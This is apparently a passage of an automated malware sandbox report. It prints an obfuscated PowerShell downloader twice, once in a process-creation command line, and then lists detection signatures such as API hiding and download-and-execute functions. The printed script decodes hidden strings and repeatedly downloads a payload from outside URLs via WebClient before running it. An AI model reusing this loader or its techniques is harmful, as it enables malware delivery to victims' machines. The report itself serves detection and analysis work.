$truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9 Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 0_2_0041CB50
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00457106 push ecx; ret 0_2_00457119
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00457A28 push eax; ret 0_2_00457A46
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00434E56 push ecx; ret 0_2_00434E69
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_10002806 push ecx; ret 0_2_10002819
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0044693D push ecx; ret 4_2_0044694D
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0044DB70 push eax; ret 4_2_0044DB84
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0044DB70 push eax; ret 4_2_0044DBAC
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00451D54 push eax; ret 4_2_00451D61
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_0044B090 push eax; ret 5_2_0044B0A4
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_0044B090 push eax; ret 5_2_0044B0CC
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_00451D34 push eax; ret 5_2_00451D41
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_00444E71 push ecx; ret 5_2_00444E81
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_00414060 push eax; ret 6_2_00414074
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_00414060 push eax; ret 6_2_0041409C
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_00414039 push ecx; ret 6_2_00414049
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_004164EB push 0000006Ah; retf 6_2_004165C4
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_00416553 push 0000006Ah; retf 6_2_004165C4
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_00416555 push 0000006Ah; retf 6_2_004165C4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_027E98B0 push C36F6DB3h; ret 7_2_027E98E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_06F407A0 push esp; iretd 7_2_06F4093D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_06F41FB2 push eax; mov dword ptr [esp], ecx 7_2_06F421B4
Contains functionality to download and launch executables
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00406EB0 ShellExecuteW,URLDownloadToFileW, 0_2_00406EB0
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 0_2_0041AA4A
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 0_2_0041CB50
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
